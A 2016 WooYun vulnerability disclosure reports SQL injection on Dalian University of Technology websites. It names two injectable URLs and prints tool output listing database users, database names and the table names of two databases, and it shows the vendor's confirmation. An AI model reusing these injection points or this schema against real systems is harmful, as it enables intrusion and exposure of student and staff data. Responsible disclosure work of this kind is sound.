当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0168699

漏洞标题:大连理工大学多站存在sql注入导致大量信息泄露(学生教师==)

相关厂商:大连理工大学

漏洞作者: 猪猪虾

提交时间:2016-01-11 11:56

修复时间:2016-02-22 16:48

公开时间:2016-02-22 16:48

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-01-11: 细节已通知厂商并且等待厂商处理中
2016-01-11: 厂商已经确认,细节仅向厂商公开
2016-01-21: 细节向核心白帽子及相关领域专家公开
2016-01-31: 细节向普通白帽子公开
2016-02-10: 细节向实习白帽子公开
2016-02-22: 细节向公众公开

简要描述:

大连理工大学多站存在sql注入导致大量信息泄露(学生教师==)
注:所有数据均已经删除! 未作为商业用途! 仅安全测试!

详细说明:

注入点:http://ia-lab.dlut.edu.cn/cn/detail.asp?id=38


注入1.png


注入2.png


注入点:http://mpa.dlut.edu.cn/TeacherDetail.aspx?tid=11


database management system users [35]:
[*] BUILTIN\\Administrators
[*] bysadmin1
[*] chuangxin
[*] crisr
[*] dfxy
[*] dns
[*] dutdice2010
[*] dutlz
[*] dutoffice
[*] dutsice2010
[*] dutxb
[*] ggg
[*] gsNews_User
[*] itsde
[*] jianyiy
[*] JiJianWeiAdmin
[*] jijin0318
[*] JskfY
[*] kzxy
[*] meme
[*] mpagl
[*] nevl
[*] nic
[*] nicweb
[*] order2016
[*] proflog
[*] renwen
[*] sa
[*] sme
[*] ssgl
[*] tianyi
[*] xyzh
[*] ZhaoShengAdmin
[*] zhaoshengnew
[*] zizhu
available databases [35]:
[*] ASPState
[*] chuangxinyuan
[*] CMS_JianYi
[*] CMS_JiJianWei
[*] CMS_KeJiKaiFaYuan
[*] CMS_ZhaoSheng
[*] crisr
[*] db_mpa
[*] dfxy
[*] dlut_account
[*] dormmis
[*] dutdice
[*] dutsice
[*] ggg
[*] graduate
[*] gsNews
[*] itsweb
[*] jijinhui
[*] master
[*] meme
[*] model
[*] msdb
[*] nevl_data
[*] Northwind
[*] order
[*] prof
[*] pubinfo
[*] pubs
[*] renwen
[*] shebei
[*] sme
[*] tempdb
[*] xueshengchu
[*] xyh
[*] zidonghua
Database: CMS_ZhaoSheng
[34 tables]
+-----------------------------+
| CMS_Admin |
| CMS_BadIP |
| CMS_ClassTree |
| CMS_Log_VisitedCount |
| CMS_Model |
| CMS_Model_Ad |
| CMS_Model_MarkLine |
| CMS_Model_MarkLine2 |
| CMS_Model_News |
| CMS_Model_Score |
| CMS_Model_SignUp |
| U_admin |
| U_arthortation |
| U_bmstate |
| U_hortation |
| U_provinceid |
| U_raceid |
| U_school |
| U_sheet1 |
| U_sheet2 |
| U_sheet3 |
| U_sheet3_2 |
| U_sheet4 |
| U_sheet6 |
| U_sportitems |
| U_sportsinfo |
| U_testitem |
| U_userinfo |
| U_userlog |
| U_visageid |
| dtproperties |
| sysconstraints |
| syssegments |
| zhaoshengnew.U_yishuAddress |
+-----------------------------+
Database: db_mpa
[73 tables]
+---------------------------+
| downloadtype |
| dtproperties |
| sysconstraints |
| syssegments |
| tb_anli |
| tb_article |
| tb_banji |
| tb_chengji |
| tb_count |
| tb_doc |
| tb_email |
| tb_file |
| tb_file_info |
| tb_gly |
| tb_image |
| tb_ip |
| tb_jc |
| tb_jchapter |
| tb_jcsmallchapter |
| tb_jiaoshi |
| tb_jiaoshou |
| tb_jxyj |
| tb_kecheng |
| tb_link |
| tb_magzine |
| tb_media |
| tb_newstype |
| tb_permit_status |
| tb_pyjh |
| tb_qita |
| tb_research |
| tb_shumu |
| tb_teacher_info |
| tb_web |
| tb_xiazai |
| tb_xinde |
| tb_xinwen |
| tb_xshbj |
| tb_xstj |
| tb_xuesheng |
| tb_xuexiao |
| tb_yanjiu |
| tb_zd |
| tb_zhangjie |
| tb_zhuanye |
| tc_shengfen |
| tc_xb |
| vw_achievement |
| vw_anli |
| vw_anliforsearch |
| vw_baseinfo_stu |
| vw_baseinfo_tea |
| vw_class |
| vw_classinfo |
| vw_jcsmall |
| vw_myclasses |
| vw_mytask |
| vw_mytask_2 |
| vw_news |
| vw_studentclasses |
| vw_task |
| vw_teacher |
| vw_xiazai |
| vw_xinwen |
| vw_xstj |
| mpagl.D99_CMD |
| mpagl.D99_Tggg |
| mpagl.D99_Tmp |
| mpagl.ahcmd |
| mpagl.comd_list |
| mpagl.kill_kk |
| mpagl.lunhui |
| mpagl.pangolin_test_table |
+---------------------------+

dump信息.png


数据.png


数据4.png


数据5.png


数据3.png


注:所有数据均已经删除! 未作为商业用途! 仅安全测试!

漏洞证明:

以上足以说明漏洞存在!

注入3.png


数据5.png

修复方案:

过滤

版权声明:转载请注明来源 猪猪虾@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2016-01-11 13:16

厂商回复:

mpa网站已经限制访问,通知负责部门进行处理

最新状态:

暂无